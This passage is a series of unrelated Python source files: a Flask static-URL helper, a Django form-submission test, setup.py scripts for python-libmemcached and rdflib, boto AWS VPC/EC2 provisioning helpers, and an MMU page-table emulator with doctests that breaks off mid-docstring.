print 'result', np.sum(auto_correlation1 - auto_correlation2)
if plot2:
plt.subplot(2, 1, 1)
plt.plot(auto_correlation1)
plt.subplot(2, 1, 2)
plt.plot(auto_correlation2)
plt.show()
|
import os.path
from flask import url_for
from npactflask import app
@app.context_processor
def vSTATIC():
def STATICV(filename):
if app.config['DEBUG']:
vnum = os.path.getmtime(os.path.join(app.static_folder, filename))
else:
vnum = app.config['VERSION']
return (url_for('static', filename=filename, vnum=vnum))
return dict(vSTATIC=STATICV)
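# Usage sketch (illustrative filename): inside a Jinja2 template the context
# processor exposes ``vSTATIC`` for cache-busted static URLs, e.g.
#   <link rel="stylesheet" href="{{ vSTATIC('css/app.css') }}">
# where the ``vnum`` query argument changes whenever the file's mtime (in
# DEBUG) or the configured VERSION changes.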
|
from toyz.web import app
from toyz.web import tasks
|
from StringIO import StringIO
from django.test import TestCase
from django.test.client import Client
from corehq.apps.app_manager.models import Application, APP_V1, Module
from corehq.apps.app_manager.success_message import SuccessMessage
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import CommCareUser
from datetime import datetime, timedelta
from dimagi.utils.parsing import json_format_datetime
from receiver.xml import get_simple_response_xml, ResponseNature
submission_template = """<?xml version='1.0' ?>
<data xmlns="%(xmlns)s">
<meta>
<username>%(username)s</username>
<userID>%(userID)s</userID>
</meta>
</data>
"""
class SuccessMessageTest(TestCase):
message = "Thanks $first_name ($name)! You have submitted $today forms today and $week forms since Monday."
domain = "test"
username = "danny"
first_name = "Danny"
last_name = "Roberts"
password = "123"
xmlns = "http://dimagi.com/does_not_matter"
tz = timedelta(hours=0)
def setUp(self):
create_domain(self.domain)
couch_user = CommCareUser.create(self.domain, self.username, self.password)
userID = couch_user.user_id
couch_user.first_name = self.first_name
couch_user.last_name = self.last_name
couch_user.save()
self.sm = SuccessMessage(self.message, userID, tz=self.tz)
c = Client()
app = Application.new_app(self.domain, "Test App", application_version=APP_V1)
app.add_module(Module.new_module("Test Module", "en"))
form = app.new_form(0, "Test Form", "en")
form.xmlns = self.xmlns
app.success_message = {"en": self.message}
app.save()
def fake_form_submission(userID=userID, username=self.username, xmlns=self.xmlns, time=None):
submission = submission_template % {
"userID": userID,
"username": username,
"xmlns": xmlns
}
f = StringIO(submission.encode('utf-8'))
f.name = "tempfile.xml"
kwargs = dict(HTTP_X_SUBMIT_TIME=json_format_datetime(time)) if time else {}
response = c.post("/a/{self.domain}/receiver/".format(self=self), {
'xml_submission_file': f,
}, **kwargs)
return response
self.num_forms_today = 0
self.num_forms_this_week = 0
now = datetime.utcnow()
tznow = now + self.tz
week_start = tznow - timedelta(days=tznow.weekday())
week_start = datetime(week_start.year, week_start.month, week_start.day) - self.tz
day_start = datetime(tznow.year, tznow.month, tznow.day) - self.tz
spacing = 6
for h in xrange((24/spacing)*8):
time = now-timedelta(hours=spacing*h)
response = fake_form_submission(time=time)
if time > week_start:
self.num_forms_this_week += 1
if time > day_start:
self.num_forms_today += 1
self.assertEqual(
response.content,
get_simple_response_xml(("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
"You have submitted {self.num_forms_today} forms today "
"and {self.num_forms_this_week} forms since Monday.").format(self=self),
nature=ResponseNature.SUBMIT_SUCCESS)
)
def testRender(self):
self.assertEqual(
self.sm.render(),
("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
"You have submitted {self.num_forms_today} forms today "
"and {self.num_forms_this_week} forms since Monday.").format(self=self)
)
|
from django import forms
from oldcontrib.media.document.models import Document
class DocumentUpload(forms.ModelForm):
class Meta:
model = Document
fields = ('document',)
|
from setuptools import setup, Extension
setup(
name = "python-libmemcached",
version = "0.17.0",
description="python memcached client wrapped on libmemcached",
maintainer="subdragon",
maintainer_email="subdragon@gmail.com",
requires = ['pyrex'],
# This assumes that libmemcache is installed with base /usr/local
ext_modules=[Extension('cmemcached', ['cmemcached.pyx'],
libraries=['memcached'],
)],
test_suite="cmemcached_test",
)
|
from aws_lib import SpinupError
import base64
from boto import vpc, ec2
from os import environ
from pprint import pprint
import re
import sys
import time
from yaml_lib import yaml_attr
def read_user_data( fn ):
"""
Given a filename, returns the file's contents in a string.
"""
r = ''
with open( fn ) as fh:
r = fh.read()
fh.close()
return r
def get_tags( ec, r_id ):
"""
Takes EC2Connection object and resource ID. Returns tags associated
with that resource.
"""
return ec.get_all_tags(filters={ "resource-id": r_id })
def get_tag( ec, obj, tag ):
"""
    Get the tag with the given name associated with the given resource object.
    Returns the matching boto Tag object, or None if the tag is not set.
    Warning: EC2 tags are case-sensitive.
"""
tags = get_tags( ec, obj.id )
found = 0
for t in tags:
if t.name == tag:
found = 1
break
if found:
return t
else:
return None
def update_tag( obj, tag, val ):
"""
Given an EC2 resource object, a tag and a value, updates the given tag
to val.
"""
for x in range(0, 5):
error = False
try:
obj.add_tag( tag, val )
except:
error = True
e = sys.exc_info()[0]
print "Huh, trying again ({})".format(e)
time.sleep(5)
if not error:
print "Object {} successfully tagged.".format(obj)
break
return None
def init_region( r ):
"""
Takes a region string. Connects to that region. Returns EC2Connection
and VPCConnection objects in a tuple.
"""
# connect to region
c = vpc.connect_to_region( r )
ec = ec2.connect_to_region( r )
return ( c, ec )
def init_vpc( c, cidr ):
"""
Takes VPCConnection object (which is actually a connection to a
particular region) and a CIDR block string. Looks for our VPC in that
region. Returns the boto.vpc.vpc.VPC object corresponding to our VPC.
See:
http://boto.readthedocs.org/en/latest/ref/vpc.html#boto.vpc.vpc.VPC
"""
# look for our VPC
all_vpcs = c.get_all_vpcs()
found = 0
our_vpc = None
for v in all_vpcs:
if v.cidr_block == cidr:
our_vpc = v
found = 1
break
if not found:
raise SpinupError( "VPC {} not found".format(cidr) )
return our_vpc
def init_subnet( c, vpc_id, cidr ):
"""
Takes VPCConnection object, which is actually a connection to a
region, and a CIDR block string. Looks for our subnet in that region.
If subnet does not exist, creates it. Returns the subnet resource
object on success, raises exception on failure.
"""
# look for our VPC
all_subnets = c.get_all_subnets()
found = False
our_subnet = None
for s in all_subnets:
if s.cidr_block == cidr:
#print "Found subnet {}".format(cidr)
our_subnet = s
found = True
break
if not found:
our_subnet = c.create_subnet( vpc_id, cidr )
return our_subnet
def set_subnet_map_public_ip( ec, subnet_id ):
"""
Takes ECConnection object and SubnetId string. Attempts to set the
MapPublicIpOnLaunch attribute to True.
FIXME: give credit to source
"""
orig_api_version = ec.APIVersion
ec.APIVersion = '2014-06-15'
ec.get_status(
'ModifySubnetAttribute',
{'SubnetId': subnet_id, 'MapPublicIpOnLaunch.Value': 'true'},
verb='POST'
)
ec.APIVersion = orig_api_version
return None
def derive_ip_address( cidr_block, delegate, final8 ):
"""
Given a CIDR block string, a delegate number, and an integer
representing the final 8 bits of the IP address, construct and return
    the IP address derived from these values. For example, if cidr_block is
10.0.0.0/16, the delegate number is 10, and the final8 is 8, the
derived IP address will be 10.0.10.8.
"""
result = ''
match = re.match( r'\d+\.\d+', cidr_block )
if match:
result = '{}.{}.{}'.format( match.group(0), delegate, final8 )
else:
raise SpinupError( "{} passed to derive_ip_address() is not a CIDR block!".format(cidr_block) )
return result
def get_master_instance( ec2_conn, subnet_id ):
"""
Given EC2Connection object and Master Subnet id, check that there is
just one instance running in that subnet - this is the Master. Raise
    exception if the number of instances is != 1.
Return the Master instance object.
"""
instances = ec2_conn.get_only_instances( filters={ "subnet-id": subnet_id } )
if 1 > len(instances):
raise SpinupError( "There are no instances in the master subnet" )
if 1 < len(instances):
raise SpinupError( "There are too many instances in the master subnet" )
return instances[0]
def template_token_subst( buf, key, val ):
"""
Given a string (buf), a key (e.g. '@@MASTER_IP@@') and val, replace all
occurrences of key in buf with val. Return the new string.
"""
targetre = re.compile( re.escape( key ) )
return re.sub( targetre, str(val), buf )
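# Usage sketch (illustrative values):
#   template_token_subst( "master is at @@MASTER_IP@@", '@@MASTER_IP@@', '10.0.10.8' )
#   # -> 'master is at 10.0.10.8'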
def process_user_data( fn, vars = [] ):
"""
Given filename of user-data file and a list of environment
variable names, replaces @@...@@ tokens with the values of the
    environment variables. Returns the user-data string on success;
    raises an exception on failure.
"""
# Get user_data string.
buf = read_user_data( fn )
for e in vars:
if not e in environ:
raise SpinupError( "Missing environment variable {}!".format( e ) )
buf = template_token_subst( buf, '@@'+e+'@@', environ[e] )
return buf
def count_instances_in_subnet( ec, subnet_id ):
"""
Given EC2Connection object and subnet ID, count number of instances
in that subnet and return it.
"""
instance_list = ec.get_only_instances(
filters={ "subnet-id": subnet_id }
)
return len(instance_list)
def make_reservation( ec, ami_id, **kwargs ):
"""
Given EC2Connection object, delegate number, AMI ID, as well as
all the kwargs referred to below, make a reservation for an instance
and return the registration object.
"""
# extract arguments to be passed to ec.run_instances()
our_kwargs = {
"key_name": kwargs['key_name'],
"subnet_id": kwargs['subnet_id'],
"instance_type": kwargs['instance_type'],
"private_ip_address": kwargs['private_ip_address']
}
# Master or minion?
if kwargs['master']:
our_kwargs['user_data'] = kwargs['user_data']
else:
# perform token substitution in user-data string
u = kwargs['user_data']
u = template_token_subst( u, '@@MASTER_IP@@', kwargs['master_ip'] )
u = template_token_subst( u, '@@DELEGATE@@', kwargs['delegate_no'] )
u = template_token_subst( u, '@@ROLE@@', kwargs['role'] )
u = template_token_subst( u, '@@NODE_NO@@', kwargs['node_no'] )
our_kwargs['user_data'] = u
# Make the reservation.
reservation = ec.run_instances( ami_id, **our_kwargs )
# Return the reservation object.
return reservation
def wait_for_running( ec2_conn, instance_id ):
"""
Given an instance id, wait for its state to change to "running".
"""
print "Waiting for {} running state".format( instance_id )
while True:
instances = ec2_conn.get_only_instances( instance_ids=[ instance_id ] )
print "Current state is {}".format( instances[0].state )
if instances[0].state != 'running':
print "Sleeping for 5 seconds"
time.sleep(5)
else:
print "Waiting another 5 seconds for good measure"
time.sleep(5)
break
def wait_for_available( ec2_conn, volume_id ):
"""
Given a volume id, wait for its state to change to "available".
"""
print "Waiting for {} available state".format( volume_id )
while True:
volumes = ec2_conn.get_all_volumes( volume_ids=[ volume_id ] )
print "Current status is {}".format( volumes[0].status )
if volumes[0].status != 'available':
print "Sleeping for 5 seconds"
time.sleep(5)
else:
break
def wait_for_detachment( ec2_conn, v_id, i_id ):
"""
Given a volume ID and an instance ID, wait for volume to
become detached.
"""
print "Waiting for volume {} to be detached from instnace {}".format(v_id, i_id)
while True:
attached_vol = ec2_conn.get_all_volumes(
filters={
"volume-id": v_id,
"attachment.instance-id": i_id,
"attachment.device": "/dev/sdb"
}
)
print "attached_vol == {}".format(attached_vol)
if attached_vol is None or len(attached_vol) == 0:
print "Detached!"
break
else:
time.sleep(5)
print "Still attached."
|
import sys
import os
import re
def setup_python3():
# Taken from "distribute" setup.py
from distutils.filelist import FileList
from distutils import dir_util, file_util, util, log
from os.path import join, exists
tmp_src = join("build", "src")
# Not covered by "setup.py clean --all", so explicit deletion required.
if exists(tmp_src):
dir_util.remove_tree(tmp_src)
log.set_verbosity(1)
fl = FileList()
for line in open("MANIFEST.in"):
if not line.strip():
continue
fl.process_template_line(line)
dir_util.create_tree(tmp_src, fl.files)
outfiles_2to3 = []
for f in fl.files:
outf, copied = file_util.copy_file(f, join(tmp_src, f), update=1)
if copied and outf.endswith(".py"):
outfiles_2to3.append(outf)
util.run_2to3(outfiles_2to3)
# arrange setup to use the copy
sys.path.insert(0, tmp_src)
return tmp_src
kwargs = {}
if sys.version_info[0] >= 3:
from setuptools import setup
kwargs['use_2to3'] = True
kwargs['install_requires'] = ['isodate', 'pyparsing']
kwargs['tests_require'] = ['html5lib']
kwargs['requires'] = [
'isodate', 'pyparsing',
'SPARQLWrapper']
kwargs['src_root'] = setup_python3()
assert setup
else:
try:
from setuptools import setup
assert setup
kwargs['test_suite'] = "nose.collector"
kwargs['install_requires'] = [
'isodate',
'pyparsing', 'SPARQLWrapper']
if sys.version_info[1]<7: # Python 2.6
kwargs['install_requires'].append('ordereddict')
if sys.version_info[1]<6: # Python 2.5
kwargs['install_requires'].append('pyparsing<=1.5.7')
kwargs['install_requires'].append('simplejson')
kwargs['install_requires'].append('html5lib==0.95')
else:
kwargs['install_requires'].append('html5lib')
except ImportError:
from distutils.core import setup
def find_version(filename):
_version_re = re.compile(r'__version__ = "(.*)"')
for line in open(filename):
version_match = _version_re.match(line)
if version_match:
return version_match.group(1)
version = find_version('rdflib/__init__.py')
packages = ['rdflib',
'rdflib/extras',
'rdflib/plugins',
'rdflib/plugins/parsers',
'rdflib/plugins/parsers/pyRdfa',
'rdflib/plugins/parsers/pyRdfa/transform',
'rdflib/plugins/parsers/pyRdfa/extras',
'rdflib/plugins/parsers/pyRdfa/host',
'rdflib/plugins/parsers/pyRdfa/rdfs',
'rdflib/plugins/parsers/pyMicrodata',
'rdflib/plugins/serializers',
'rdflib/plugins/sparql',
'rdflib/plugins/sparql/results',
'rdflib/plugins/stores',
'rdflib/tools'
]
if os.environ.get('READTHEDOCS', None):
# if building docs for RTD
# install examples, to get docstrings
packages.append("examples")
setup(
name='rdflib',
version=version,
description="RDFLib is a Python library for working with RDF, a " + \
"simple yet powerful language for representing information.",
author="Daniel 'eikeon' Krech",
author_email="eikeon@eikeon.com",
maintainer="RDFLib Team",
maintainer_email="rdflib-dev@google.com",
url="https://github.com/RDFLib/rdflib",
license="https://raw.github.com/RDFLib/rdflib/master/LICENSE",
platforms=["any"],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Libraries :: Python Modules",
"Operating System :: OS Independent",
"Natural Language :: English",
],
long_description="""\
RDFLib is a Python library for working with
RDF, a simple yet powerful language for representing information.
The library contains parsers and serializers for RDF/XML, N3,
NTriples, Turtle, TriX, RDFa and Microdata. The library presents
a Graph interface which can be backed by any one of a number of
Store implementations. The core rdflib includes store
implementations for in memory storage, persistent storage on top
of the Berkeley DB, and a wrapper for remote SPARQL endpoints.
A SPARQL 1.1 engine is also included.
If you have recently reported a bug marked as fixed, or have a craving for
the very latest, you may want the development version instead:
easy_install https://github.com/RDFLib/rdflib/tarball/master
Read the docs at:
http://rdflib.readthedocs.org
""",
packages = packages,
entry_points = {
'console_scripts': [
'rdfpipe = rdflib.tools.rdfpipe:main',
'csv2rdf = rdflib.tools.csv2rdf:main',
'rdf2dot = rdflib.tools.rdf2dot:main',
'rdfs2dot = rdflib.tools.rdfs2dot:main',
'rdfgraphisomorphism = rdflib.tools.graphisomorphism:main',
],
},
**kwargs
)
|
try:
from primitives import Mem
except ImportError:
from mem import Mem
import sys
if sys.version >= '3':
xrange = range
class MMU():
def __init__(self, mem, size=0):
""" Initialize MMU
"""
self._enabled = False
self._mem = mem
self._wordsize = 4
self._table = []
def isEnabled(self):
return self._enabled
def enable(self):
""" Enables MMU
"""
self._enabled = True
def disable(self):
""" Disables MMU
"""
self._enabled = False
def getEntries(self, entries, startpos=None):
""" Get page entries and parse them, handle recursively
>>> from primitives import Mem
>>> m = Mem(1024*1024)
>>> m.setData(0, 0x00000100, 4)
>>> m.setData(4, 0x00001100, 4)
>>> m.setData(8, 0x00002100, 4)
>>> m.setData(12, 0x00003100, 4)
>>> u = MMU(m)
>>> entries = [(0, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': False, 'size2': False, 'write': False, 'subtable': True, 'userspace': False, 'size': 4*1024}), 0),
... (32768, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': True, 'size2': False, 'write': False, 'subtable': False, 'userspace': False, 'size': 64}), 65536),
... (0, MMU.Flags(solved={'execute': False, 'ok': True, 'size1': False, 'size2': False, 'write': False, 'subtable': False, 'userspace': False, 'size': 4}), 131072)]
>>> u.getEntries(entries)
[(0, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0), (4096, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4096), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 8192), (12288, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 12288), (32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 65536), (0, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 131072)]
"""
if startpos is None:
startpos = 0
subs = []
for (addr, flags, pos) in entries:
if flags['subtable']:
size = flags['size'] * 1024 / 4
if flags['ok']:
tmp = self.readTable(addr, size, pos)
entries = self.getEntries(tmp, startpos)
subs += entries
startpos += flags['size'] * 1024
else:
if flags['ok']:
subs.append((addr, flags, pos))
return subs
def initialize(self, tablepos, tablesize):
""" Initializes MMU with a initial page
Does recursive parsing
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Subtable, starts at phys 4k
>>> m.setData(22, 0x00001111, 4)
>>> # Page, virtual start at 32k, size 64k
>>> m.setData(14, 0x00008110, 4)
>>> # Page, virtual start at 98k, size 4k
>>> m.setData(18, 0x00018100, 4)
>>> for i in xrange(1023):
... m.setData(0x1000 + i, 0)
>>> # Page at 8k, size 4k
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at 12k, size 1M
>>> m.setData(0x1004, 0x00003120, 4)
>>> u.initialize(14, 3)
[(32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 0), (98304, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 65536), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 69632), (12288, execute=False,ok=True,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 73728)]
"""
entries = self.readTable(tablepos, tablesize)
self._table = self.getEntries(entries)
return self._table
def diffTime(self, a, b):
d = a - b
print (d.seconds*1000*1000 + d.microseconds)
def readTable(self, tablepos, tablesize, pos=None):
""" Reads table from memory
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Subtable, starts at phys 4k
>>> m.setData(10, 0x00001111, 4)
>>> # Page, starts at 32k, size 64k
>>> m.setData(14, 0x00008110, 4)
>>> for i in xrange(1023):
... m.setData(0x1000 + i, 0)
>>> tmp = u.readTable(10, 3)
>>> tmp[0][0]
4096
>>> tmp[1][0]
32768
>>> tmp[0][1]
execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False
>>> tmp[1][1]
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> tmp[0]
(4096, execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False, 0)
>>> tmp[1]
(32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 67108864)
"""
import datetime
datas = []
if pos is None:
pos = 0
virtpos = tablepos
cnt = 0
# Optimized reading in blocks instead of one byte at time
block = self._mem.getBlock(tablepos, tablesize * 4)
oldtmp = 0
items = 0
preindex = 0
for (bpos, data) in block:
if data is None:
continue
if preindex > 0:
# Do we have old data from previous block?
if preindex == 1:
oldtmp += (data[0] << 24)
if preindex == 2:
oldtmp += (data[0] << 16) + (data[1] << 24)
if preindex == 3:
oldtmp += (data[0] << 8) + (data[1] << 16) + (data[2] << 24)
(ok, pos, res) = self.readEntry(oldtmp, pos)
if ok:
datas.append(res)
tablepos = preindex
datalen = len(data)
l = int(datalen / 4 - 1)
index = tablepos % 0x1000
for item in xrange(l):
tmp = data[index] + (data[index+1] << 8) + (data[index+2] << 16) + (data[index+3] << 24)
(ok, pos, res) = self.readEntry(tmp, pos)
if ok:
datas.append(res)
index += 4
items += 4
if index > datalen - 4:
miss = datalen - index
preindex = 0
# Check if we didn't read all the data...
if miss > 0:
oldtmp = data[index]
if miss > 1:
oldtmp += (data[index+1] << 8)
if miss > 2:
oldtmp += (data[index+2] << 16)
preindex = 4 - miss
break
if items > (tablesize + tablepos):
break
return datas
"""
for index in xrange(tablesize):
tmp = self._mem.getData(virtpos, self._wordsize)
virtpos += self._wordsize
if tmp > 0:
print tmp
cnt += 1
(ok, pos, res) = self.readEntry(tmp, pos)
if ok:
datas.append(res)
return datas
"""
def readEntry(self, data, pos=0):
""" Read entry from one page table item data
>>> m = Mem()
>>> u = MMU(m)
>>> u.readEntry(0x00000000)
(False, 0, (0, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00001000)
(True, 4096, (4096, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00001111)
(True, 67108864, (4096, execute=False,ok=True,size=65536,size1=True,size2=False,subtable=True,userspace=False,write=False, 0))
>>> u.readEntry(0x00001022)
(True, 1048576, (4096, execute=True,ok=False,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 0))
>>> u.readEntry(0x00002FFF)
(True, 68719476736, (8192, execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True, 0))
>>> u.readEntry(0xFFFFFFFF)
(True, 68719476736, (4294963200, execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True, 0))
>>> u.readEntry(0)
(False, 0, (0, execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0))
"""
        if data > 0:
            flags = MMU.Flags(data & 0xFFF)
            vaddr = data & 0xFFFFF000
            ok = True
        else:
            vaddr = 0
            flags = MMU.Flags(data & 0xFFF)
            ok = False
            return (ok, pos, (vaddr, flags, pos))
        return (ok, pos + flags['size'] * 1024, (vaddr, flags, pos))
def getRange(self, item):
addr = item[0]
flags = item[1]
pos = item[2]
endaddr = addr + (flags['size'] * 1024)
return (addr, endaddr, pos)
def virtToPhys(self, pos):
""" Converts virtual memory location to physical
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Page, virtual start at 96k, size 4k (0x1000)
>>> m.setData(14, 0x00018100, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Subtable, starts at phys 4k, size 4M
>>> m.setData(22, 0x00001101, 4)
>>> # Page at virtual at 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual at 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 5)
>>> u.virtToPhys(0x8000) == (0x2000)
True
>>> u.virtToPhys(0x8000)
8192
>>> u.virtToPhys(0x8001)
8193
>>> u.virtToPhys(0x2000)
73728
>>> u.virtToPhys(0x2000) == (0x2000 + 0x10000)
True
>>> u.virtToPhys(0x2010) == (0x2000 + 0x10000 + 0x10)
True
>>> u.virtToPhys(0x2FFF) == (0x2000 + 0x10000 + 0xFFF)
True
>>> u.virtToPhys(0x18000) == 0x1000
True
>>> u.virtToPhys(0x19000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019000
>>> u.virtToPhys(0x19001) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019001
>>> u.virtToPhys(0x1A000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 0001A000
>>> u.virtToPhys(0) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00000000
"""
for item in self._table:
(a, b, c) = self.getRange(item)
if a <= pos and pos < b:
index = (pos - a)
phys = c + index
return phys
raise IndexError('No page mapped at virtual: %.8X' % (pos))
def getPageFlags(self, pos):
""" Get flags at position
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Subtable, starts at phys 4k (0x1000)
>>> m.setData(14, 0x00001101, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Page, virtual start at 96, size 4k (0x1000)
>>> m.setData(22, 0x00018100, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 4)
>>> u.enable()
>>> u.getPageFlags(0x8000)
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x8001)
execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x18000)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x18010)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0x19000)
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019000
>>> u.getPageFlags(0x19001) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00019001
>>> u.getPageFlags(0x1A000) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 0001A000
>>> u.getPageFlags(0x18fff)
execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> u.getPageFlags(0) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: No page mapped at virtual: 00000000
"""
if not self._enabled:
return None
for item in self._table:
(a, b, c) = self.getRange(item)
if a <= pos and pos < b:
return item[1]
raise IndexError('No page mapped at virtual: %.8X' % (pos))
def setData(self, pos, data, size=4):
""" Set data, if MMU enabled, solve physical locations first
>>> from primitives import Mem
>>> m = Mem(1024*1024*5)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Page, virtual start at 96, size 4k (0x1000)
>>> m.setData(14, 0x00018100, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Subtable, starts at phys 4k, size 4M (0x1000)
>>> m.setData(22, 0x00001101, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> tmp = u.initialize(10, 4)
>>> # Paging is disabled, set data to phys 0x8000
>>> u.setData(0x8000, 56, 1)
>>> # Enable paging
>>> u.enable()
>>> # Paging is enabled so set data to virt 0x8000, which is 0x2000 in phys
>>> u.setData(0x8000, 42, 1)
>>> # Get memory contents at 0x8000 phys
>>> m.getData(0x8000, 1)
56
>>> # Get memory contents at 0x2000 phys
>>> m.getData(0x2000, 1)
42
"""
if self._enabled:
self._mem.setData(self.virtToPhys(pos), data, size)
else:
self._mem.setData(pos, data, size)
def getData(self, pos, size=1):
""" Get data, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*1024*10)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> # Subtable, starts at phys 4k (0x1000)
>>> m.setData(14, 0x00001101, 4)
>>> # Page, virtual start at 32k, size 64k (0x10000)
>>> m.setData(18, 0x00008110, 4)
>>> # Page, virtual start at 96k, size 4k (0x1000)
>>> m.setData(22, 0x00018100, 4)
>>> # Page at virtual 8k, size 4k (0x1000)
>>> m.setData(0x1000, 0x00002100, 4)
>>> # Page at virtual 1126k, size 1M
>>> m.setData(0x1004, 0x00113120, 4)
>>> u.initialize(10, 4)
[(24576, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 0), (8192, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4096), (1126400, execute=False,ok=True,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False, 8192), (32768, execute=False,ok=True,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False, 4198400), (98304, execute=False,ok=True,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False, 4263936)]
>>> # Paging is disabled, set data to phys 0x8000
>>> u.setData(0x8000, 56, 1)
>>> # Paging is disabled, set data to phys 0x100
>>> u.setData(0x100, 12345, 4)
>>> # Enable paging
>>> u.enable()
>>> # Paging is enabled so set data to virt 0x8000, which is 0x2000 in phys
>>> u.setData(0x8000, 42, 1)
>>> # Get memory contents at 0x8000 virt
>>> u.getData(0x8000, 1)
42
>>> # Get memory contents at 0x100 phys, 0x6000+0x100 virt
>>> u.getData(0x6000 + 0x100, 4)
12345
"""
if self._enabled:
return self._mem.getData(self.virtToPhys(pos), size)
else:
return self._mem.getData(pos, size)
def setRaw(self, pos, data):
""" Set one byte, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> tmp = u.initialize(10, 1)
>>> u.setRaw(0x100, 255)
>>> u.enable()
>>> u.setRaw(0x6001, 123)
>>> m.getRaw(0x100)
255
>>> m.getRaw(0x1)
123
"""
if self._enabled:
self._mem.setRaw(self.virtToPhys(pos), data)
else:
self._mem.setRaw(pos, data)
def getRaw(self, pos):
""" Get one byte, if MMU enabled, solve physical location first
>>> from primitives import Mem
>>> m = Mem(1024*100)
>>> u = MMU(m)
>>> # Page, virtual start at 24, size 4k (0x1000)
>>> m.setData(10, 0x00006100, 4)
>>> tmp = u.initialize(10, 1)
>>> u.setRaw(0x100, 255)
>>> u.enable()
>>> u.setRaw(0x6001, 123)
